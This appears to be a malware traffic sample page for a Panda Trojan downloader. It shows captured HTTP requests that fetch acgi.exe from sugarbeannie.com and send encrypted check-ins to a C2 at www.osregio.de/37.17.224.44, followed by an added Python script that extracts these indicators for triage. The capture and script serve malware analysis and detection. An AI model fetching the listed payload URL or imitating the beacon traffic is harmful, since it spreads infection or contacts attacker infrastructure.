Panda Malware Trojan Downloader 37.17.224.44 POST /images/file.php acgi.exe PCAP file Download Traffic Sample

https://malwr.com/analysis/NzM3YjRiY2NhMmI1NDljNjhjNTkwMDk2NjkzYmFlYjQ/

https://www.virustotal.com/en/file/0858e188c9312ee2e4cf3c85ae4ba11dafba30a1dca36ca40a2d2d5f712f07af/analysis/1477177765/


2016-10-23 00:52:03.435441 IP 192.168.1.102.58739 > 103.44.63.13.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /files/acgi.exe HTTP/1.1
E..Ml.@...$....fg,?..s.Pl.{....(P.......GET /files/acgi.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: sugarbeannie.com
Connection: Keep-Alive


E..(..@........f%..,.v.Pb..:p..AP...`9........
2016-10-23 00:52:37.816876 IP 192.168.1.102.58742 > 37.17.224.44.80: Flags [P.], seq 0:358, ack 1, win 256, length 358: HTTP: POST /images/file.php HTTP/1.1
E.....@........f%..,.v.Pb..:p..AP.... ..POST /images/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.osregio.de
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

.&.D'.A...7.O7..(.....]....IZ....#n.....H       h..M./.."..`....M.c9...w..."l&.m.!...J/}...x.c......A.....Q.{..y..Q%|.|...p.>..a.@'9,.<..L.P..R.~U..

E..(..@........f%..,.w.P@.......P....m........
2016-10-23 00:52:37.827633 IP 192.168.1.102.58743 > 37.17.224.44.80: Flags [P.], seq 0:348, ack 1, win 256, length 348: HTTP: POST /images/file.php HTTP/1.1
E.....@........f%..,.w.P@.......P....u..POST /images/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.osregio.de
Content-Length: 132
Connection: Keep-Alive
Cache-Control: no-cache

..Nv.HG.-%.......0v}I.Vc<.W.B...k.`@..88u..*..=h....Xg....[w'

E..(..@........f%..,.v.Pb...p.o.P....q........
2016-10-23 00:52:40.282011 IP 192.168.1.102.58743 > 37.17.224.44.80: Flags [P.], seq 348:709, ack 21513, win 252, length 361: HTTP: POST /images/file.php HTTP/1.1
E.....@....>...f%..,.w.P@.....&.P...D...POST /images/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.osregio.de
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

.....DOlkG..H.v....<.....z....2YtQ..\.n.m..4.]..D..Y....&..G.j...Bm.$-.`i.1.q.Y.}.J.[E.a4..[.|...TL.6.-|.w....P.....).<...e..jh=...G6M8.cZ..9....

E..( :@....J...f%..,.w.P@..v.../P....@........

2016-10-23 00:53:05.970828 IP 192.168.1.102.58748 > 216.58.195.132.80: Flags [P.], seq 0:339, ack 1, win 256, length 339: HTTP: GET /webhp HTTP/1.1
E..{..@........f.:...|.P.xT...%.P...pY..GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.google.com
Cache-Control: no-cache
Cookie: NID=80=PuI3ndFmrhORQcOnvJ78stoO8InYSSywkr-fV9tep-Q7iuWsGr9Toq-gfXnI-eUu1XBaJH5lNn8li2RI3q_aECCWd59Sq97Q1JSMQE-QkORL_13WACLtVTyIFGWSEq_4t3yjuJgknq_Ts6U
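Scripted triage of the capture above, as an added example that is not part of the original sample page or of any tool it links to. The script takes tcpdump -A text, keeps the summary line and the HTTP headers of each request while ignoring the raw IP/TCP header bytes that -A prints ahead of the request line, and tags the two request shapes this capture shows: the GET of a bare .exe (the stager fetching acgi.exe) and the POSTs to /images/file.php, each a short opaque body sent with Cache-Control: no-cache and no Content-Type header. The CAPTURE string is a constructed excerpt reproducing the request lines and headers shown above (encrypted bodies omitted); the classification rules and the 512-byte body limit are assumptions for illustration, not a vetted signature.

```python
"""Triage helper for tcpdump -A text: pull HTTP request IOCs and flag the C2 check-ins.
Added example, not code from the original page. CAPTURE is a constructed excerpt that
reproduces the sample's summary lines, one raw header-byte line and the HTTP headers."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

CAPTURE = """\
2016-10-23 00:52:03.435441 IP 192.168.1.102.58739 > 103.44.63.13.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /files/acgi.exe HTTP/1.1
E..Ml.@...$....fg,?..s.Pl.{....(P.......GET /files/acgi.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: sugarbeannie.com
Connection: Keep-Alive

2016-10-23 00:52:37.816876 IP 192.168.1.102.58742 > 37.17.224.44.80: Flags [P.], seq 0:358, ack 1, win 256, length 358: HTTP: POST /images/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.osregio.de
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-23 00:52:37.827633 IP 192.168.1.102.58743 > 37.17.224.44.80: Flags [P.], seq 0:348, ack 1, win 256, length 348: HTTP: POST /images/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.osregio.de
Content-Length: 132
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-23 00:52:40.282011 IP 192.168.1.102.58743 > 37.17.224.44.80: Flags [P.], seq 348:709, ack 21513, win 252, length 361: HTTP: POST /images/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.osregio.de
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-23 00:53:05.970828 IP 192.168.1.102.58748 > 216.58.195.132.80: Flags [P.], seq 0:339, ack 1, win 256, length 339: HTTP: GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.google.com
Cache-Control: no-cache
"""

SUMMARY_RE = re.compile(r"^\S+ \S+ IP (?P<src>\d+(?:\.\d+){3})\.\d+ > (?P<dst>\d+(?:\.\d+){3})\.\d+: "
                        r".*?HTTP: (?P<method>[A-Z]+) (?P<uri>\S+) HTTP/1\.[01]$")
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")

@dataclass
class Request:
    src: str
    dst: str
    method: str
    uri: str
    headers: dict[str, str] = field(default_factory=dict)

    def url(self) -> str:
        return f"http://{self.headers.get('host', self.dst)}{self.uri}"

def parse_requests(capture: str) -> list[Request]:
    """One Request per summary line; headers run to the first blank line. The raw IP/TCP
    bytes that -A prints before the request line never look like 'Name: value'."""
    requests: list[Request] = []
    current: Request | None = None
    for line in capture.splitlines():
        if m := SUMMARY_RE.match(line):
            current = Request(m["src"], m["dst"], m["method"], m["uri"])
            requests.append(current)
        elif current is None or not line.strip():
            current = None                                   # blank line ends the headers
        elif h := HEADER_RE.match(line):
            current.headers[h[1].lower()] = h[2].strip()
    return requests

def classify(req: Request) -> str | None:
    # Assumed heuristics read off this capture, not a vetted signature.
    h = req.headers
    if req.method == "GET" and req.uri.lower().endswith(".exe"):
        return "payload-download"                            # stager fetching the bare executable
    if (req.method == "POST" and req.uri.lower().endswith(".php")
            and "content-type" not in h                      # opaque body, no encoding declared
            and h.get("cache-control", "").lower() == "no-cache"
            and 0 < int(h.get("content-length", "0")) < 512):
        return "c2-beacon"
    return None

def triage(capture: str) -> dict:
    tagged = [(r, classify(r)) for r in parse_requests(capture)]
    return {
        "requests": len(tagged),
        "payload_urls": sorted({r.url() for r, t in tagged if t == "payload-download"}),
        "c2_urls": sorted({r.url() for r, t in tagged if t == "c2-beacon"}),
        "c2_ips": sorted({r.dst for r, t in tagged if t == "c2-beacon"}),
        "beacons": sum(t == "c2-beacon" for _, t in tagged),
    }
```

Calling triage(CAPTURE) yields one payload URL (sugarbeannie.com/files/acgi.exe), one C2 URL and IP (www.osregio.de, 37.17.224.44) and three beacons; the google.com GET /webhp, which carries the same MSIE 8.0 user agent and the same Cache-Control: no-cache header, stays untagged, so a rule built on the user agent string alone would over-match. For a full pcap, feed the script the output of tcpdump -nA -r sample.pcap port 80. Content-Length is only what the client claims; a stricter check would compare it against the bytes actually carried in the reassembled stream.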